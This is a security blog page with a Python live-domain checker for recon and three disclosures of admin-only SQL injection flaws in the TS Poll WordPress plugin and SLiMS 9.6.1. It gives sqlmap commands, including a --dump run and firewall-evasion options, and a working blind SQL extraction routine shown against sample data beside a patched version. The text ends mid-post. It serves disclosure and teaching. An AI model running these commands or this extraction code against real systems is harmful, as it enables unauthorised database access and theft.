Wednesday, April 23, 2025

AzuLive: My First Python Tool to Check Live Domains



Hey Broccolitos!

Just wanna share a small tool that I built, called AzuLive — a Python script that helps you filter which domains are actually live and responding.

Sometimes you’ve got a long list of subdomains or URLs, and you wanna know which ones are active without checking them one by one. That’s where AzuLive comes in.

What It Does

AzuLive takes a list of domains and checks each one with an HTTP request. If a domain responds with an accepted status code such as 200, 301 or 302 (or any other codes you specify), it is saved to an output file. Simple as that!

So, why did I make this?

Well, first, I needed something to quickly filter active subdomains during recon. But also, I wanted to learn how to code. I’m still learning, and honestly… I’m not that good at coding yet :)
The code might look rough or “not perfect,” but trust me, I spent a good amount of time figuring things out, debugging, googling errors, and learning as I went... kkkkk😂

How It Works

You just run the script like this:

 python azulive.py -l domains.txt -o live.txt

 You can also specify which status codes you want to count as “alive” with the -i flag:

 python azulive.py -l domains.txt -o live.txt -i 200 301 302

Features

  • Supports custom status codes
  • Skips invalid, unreachable, or empty lines
  • Handles timeouts without crashing
  • Colorful output in your terminal 🌈
  • Has a funky ASCII art banner 😎
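To make the workflow above concrete, here is an added example in the spirit of AzuLive; it is not the author's azulive.py and does not reproduce its code. It reads a list of hosts or URLs, probes each one over HTTP(S) with a thread pool, keeps the ones whose status code is in an allow-list (the role of the -i flag), skips blank, commented or malformed lines, treats timeouts and DNS failures as "not alive" instead of crashing, and writes the survivors to an output file. Only the standard library is used. The default codes 200/301/302 and the -l/-o/-i flag names are taken from the examples on the page; the User-Agent string and the `prober` hook (which lets the filter run offline against canned results) are this example's own choices.

```python
"""
Live-host filter in the spirit of AzuLive (added example, not the original script).
Usage: python live_filter.py -l domains.txt -o live.txt [-i 200 301 302]
"""
import argparse
import sys
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Iterable, List, Optional, Set, Tuple

# Assumption: mirrors the codes used in the page's examples.
DEFAULT_ALIVE_CODES: Set[int] = {200, 301, 302}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so a 301/302 is reported as such instead of
    being silently turned into whatever the final hop returns."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def normalize_target(line: str) -> Optional[str]:
    """Trim one line of the input list; None means 'skip this line'.
    Bare hostnames get an https:// scheme so urllib can request them."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if " " in line:                      # not something we can turn into a URL
        return None
    if not line.startswith(("http://", "https://")):
        line = "https://" + line
    return line


def probe(url: str, timeout: float = 5.0) -> Optional[int]:
    """Return the HTTP status code for url, or None when nothing answered
    (DNS failure, refused connection, TLS error, timeout)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "live-filter-example/0.1"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code        # 3xx/4xx/5xx: the host is up, just not 2xx
    except (urllib.error.URLError, OSError, ValueError):
        return None          # unreachable or unparsable; do not crash the run


def filter_alive(lines: Iterable[str],
                 alive_codes: Set[int] = DEFAULT_ALIVE_CODES,
                 prober: Callable[[str], Optional[int]] = probe,
                 workers: int = 20) -> List[Tuple[str, int]]:
    """Probe every usable line concurrently and return (url, code) pairs for
    the targets whose code is in alive_codes, preserving input order."""
    targets = [t for t in (normalize_target(l) for l in lines) if t]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        codes = list(pool.map(prober, targets))
    return [(t, c) for t, c in zip(targets, codes) if c in alive_codes]


def main(argv=None) -> int:
    ap = argparse.ArgumentParser(description="keep only the live hosts from a list")
    ap.add_argument("-l", "--list", required=True, help="input file, one host/URL per line")
    ap.add_argument("-o", "--output", required=True, help="file to write live URLs to")
    ap.add_argument("-i", "--include", type=int, nargs="+",
                    default=sorted(DEFAULT_ALIVE_CODES),
                    help="status codes that count as alive")
    args = ap.parse_args(argv)
    with open(args.list, encoding="utf-8") as f:
        alive = filter_alive(f, set(args.include))
    with open(args.output, "w", encoding="utf-8") as out:
        for url, code in alive:
            out.write(url + "\n")
            print(f"[{code}] {url}")
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

Two caveats worth keeping in mind when using any tool like this during recon: a 404 or 403 still means a host is alive (it is only excluded because it is not in your allow-list), so widen -i when you are hunting for anything that answers; and wildcard DNS or a catch-all CDN front end can make every subdomain look "live", so compare the responses rather than trusting the status code alone.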

You can get the tool from here!

Thank you for reading. See you later, Broccolitos!

Monday, April 14, 2025

TS Poll <= 2.4.6 - Authenticated SQL Injection (CVE-2025-3470)


 

Hello, Broccolitos! I discovered an authenticated SQL injection vulnerability in the WordPress plugin TS Poll – Survey, Versus Poll, Image Poll, Video Poll, versions <= 2.4.6. It has been assigned CVE-2025-3470 and is now publicly listed in the Wordfence Intelligence Vulnerability Database.

Vulnerability Details

The vulnerability resides in the s POST parameter in the following endpoint:

/wp-admin/admin.php?page=ts-poll
Due to insufficient input sanitization, an authenticated attacker (Administrator+) can inject arbitrary SQL into the query and read database contents they are not meant to access. Since Administrator-level access is required, the finding mainly matters in setups where a WordPress administrator is not already trusted with the database, for example multisite installs or hardened hosts where plugin installation and file editing are disabled.

This issue is exploitable via boolean-based, time-based, and UNION-based SQL injection techniques.

 Proof of Concept:

  1.  Install the plugin and log in as an administrator.
  2.  Go to: wp-admin/admin.php?page=ts-poll
  3.  In the search bar, enter any query and intercept the request using Burp Suite.
  4.  Save the intercepted request to a file.
  5.  Run the following sqlmap command:
    sqlmap -r [requestfile] -p s --random-agent --tamper=space2comment --level 5 --risk 3

sqlmap should report the parameter s as injectable.


Plugin developers have patched this issue in version 2.4.7. It is strongly recommended to update to the latest version immediately.

References:

  • Changeset (source code)
  • Wordfence vulnerability database entry

That's all from me.
See you later, Broccolitos!

Saturday, February 22, 2025

Another SQL Injection in SLIMS 9.6.1 (CVE-2025-26200)

Well, hello Broccolitos!

This is my second article about a SLIMS vulnerability that I found in January 2025.

This vulnerability was found in /admin/modules/reporting/customs/visitor_report_day.php at the "month" parameter.

Like similar vulnerabilities, this issue arises due to improper input sanitization. This vulnerability can allow an attacker to gain sensitive information. However, it is only exploitable if the attacker has admin privileges.

Source code


 
You can see that before the vulnerability was patched, the month input was not sanitized.
After the patch, the developer modified the input handling by using an array list to define valid month values (01, 02, ..., 12) and added validation to ensure that the input is valid before processing it.

Steps to reproduce:

  1. Intercept the request to the vulnerable endpoint above in Burp Suite and modify the "month" parameter.
    (At this step you can inject a time-based blind SQLi payload by hand to extract data, or use sqlmap for the simpler route. I preferred sqlmap for automation.)

  2. Save the HTTP request to a file (e.g., with Notepad).

  3. Run sqlmap with the -r option to pass it the saved request file.
    (On a real target you may need --tamper, --level, --risk and --random-agent to get past a firewall; finding the right combination of options takes some trial and error.)

To patch this CVE, update to the latest version or modify the visitor_report_day.php code as shown in the image above.

This vulnerability was reported on 6 January 2025 and patched on 7 January. A CVE was reserved on 21 February 2025.

That's all from me. Thank you for reading my blog.

See you later, Broccolitos!

Thursday, January 23, 2025

SQL Injection Vulnerability in Senayan SLiMS 9.6.1 Bulian (CVE-2025-22980)

A SQL Injection vulnerability was found in the tempLoanID parameter on the /admin/modules/circulation/loan.php page of the Circulation module. This vulnerability can be exploited by an authenticated admin user to execute arbitrary SQL queries on the backend database, potentially leading to unauthorized access or manipulation of sensitive data. 

The vulnerability was reported on January 8, 2025. The issue was validated and a patch was deployed on the same day. A CVE was reserved on January 22, 2025.

Vulnerable Code:

The tempLoanID parameter is used in a search form. If user input is not properly validated or sanitized, it can lead to SQL Injection.

Details

  • Affected Component: /admin/modules/circulation/loan.php
  • Vulnerable Parameter: tempLoanID
  • Type of Vulnerability: SQL Injection (SQLi)
  • Authentication Required: Yes (Admin user)

Steps to Reproduce

  1. Login as an admin user and access the /admin/modules/circulation/loan.php page.
  2. On this page, there is a search field. Enter any text into the search field.
  3. Intercept the request using Burp Suite by enabling the "Intercept" feature.
  4. Save the intercepted request into a file (e.g., tes.txt).
  5. Use sqlmap with the -r option to perform an attack on the intercepted request. For example, run the following command in your terminal:
    sqlmap -r tes.txt --batch --level=5 --risk=3 --dump
  6. Observe the results from sqlmap, which may indicate successful SQL injection and possible exploitation.
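All three reports on this page (the s search parameter in TS Poll, the month parameter in visitor_report_day.php and the tempLoanID search field in loan.php) are the same bug class: a request parameter pasted into SQL text. The example below is added here and is not code from TS Poll, SLiMS or the author. It models a miniature "visitors per month" report over constructed tables (visitor_count and user, with an invented admin password) and shows three things: the report built by string concatenation, a boolean-based blind extraction routine that recovers the password through it one character at a time using only the "rows or no rows" signal, and the same report hardened the way the SLiMS patch is described (an allow-list of the twelve valid month strings plus a bound parameter), against which the same routine recovers nothing. It runs offline on SQLite; the TS Poll post also lists time-based and UNION-based variants, but SQLite has no SLEEP()-style function, so the boolean signal is the one demonstrated.

```python
"""
Vulnerable vs. hardened month report, plus boolean-based blind extraction.
Added example (not SLiMS, TS Poll or the author's code); all data is constructed.
"""
import sqlite3
import string
from typing import Callable

ALLOWED_MONTHS = {f"{m:02d}" for m in range(1, 13)}   # "01" .. "12"
PROBE_CHARS = string.ascii_letters + string.digits + string.punctuation


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE visitor_count (id INTEGER PRIMARY KEY, checkin_date TEXT);
        INSERT INTO visitor_count (checkin_date)
            VALUES ('2025-01-03'), ('2025-01-17'), ('2025-02-09');
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, passwd TEXT);
        INSERT INTO user (username, passwd) VALUES ('admin', 's3cret');
    """)
    return db


def report_vulnerable(db: sqlite3.Connection, month: str) -> int:
    """Visitors in a month, built by string concatenation: whatever the client
    sends as `month` becomes part of the SQL statement."""
    sql = ("SELECT COUNT(*) FROM visitor_count "
           "WHERE strftime('%m', checkin_date) = '" + month + "'")
    return db.execute(sql).fetchone()[0]


def report_fixed(db: sqlite3.Connection, month: str) -> int:
    """Same report, hardened two ways: the value must be one of twelve known
    strings, and it is passed as a bound parameter rather than spliced in."""
    if month not in ALLOWED_MONTHS:
        raise ValueError(f"invalid month: {month!r}")
    sql = "SELECT COUNT(*) FROM visitor_count WHERE strftime('%m', checkin_date) = ?"
    return db.execute(sql, (month,)).fetchone()[0]


def blind_extract(report: Callable[[str], int], max_len: int = 64) -> str:
    """Boolean-based blind extraction of user.passwd for 'admin'.

    The attacker only sees whether the report returns rows. Each payload keeps
    the legitimate month '01' (which has rows) and ANDs on a question about one
    character of the secret, so 'rows > 0' means yes and '0 rows' means no.
    The trailing quote is left open because the application appends its own.
    """
    def says_yes(payload: str) -> bool:
        try:
            return report(payload) > 0
        except (sqlite3.Error, ValueError):
            return False          # an error page counts as 'no'

    secret = "SELECT passwd FROM user WHERE username='admin'"
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop once the secret has no character at this position.
        if not says_yes(f"01' AND length(({secret})) >= {pos} AND '1'='1"):
            break
        for ch in PROBE_CHARS:
            if ch == "'":
                continue          # would need escaping; skipped in this demo
            if says_yes(f"01' AND (SELECT substr(passwd,{pos},1) FROM user "
                        f"WHERE username='admin') = '{ch}"):
                recovered += ch
                break
        else:
            recovered += "?"      # character outside PROBE_CHARS
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("legit query, vulnerable code :", report_vulnerable(db, "01"))
    print("tautology, vulnerable code   :", report_vulnerable(db, "01' OR '1'='1"))
    print("blind extraction, vulnerable :", blind_extract(lambda m: report_vulnerable(db, m)))
    print("blind extraction, fixed      :", repr(blind_extract(lambda m: report_fixed(db, m))))
```

The extraction loop is essentially what sqlmap automates when it reports a parameter as "boolean-based blind": one request per candidate character, with the true/false decision taken from the response. On the defensive side, note that the allow-list alone would already stop this particular payload, but the bound parameter is what makes the fix robust when the next parameter is a free-text search string like s or tempLoanID, where no short allow-list exists.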

 Impact
An attacker with admin privileges can manipulate the backend database, potentially viewing or altering sensitive data and escalating the attack to compromise the system's integrity.

Recommendations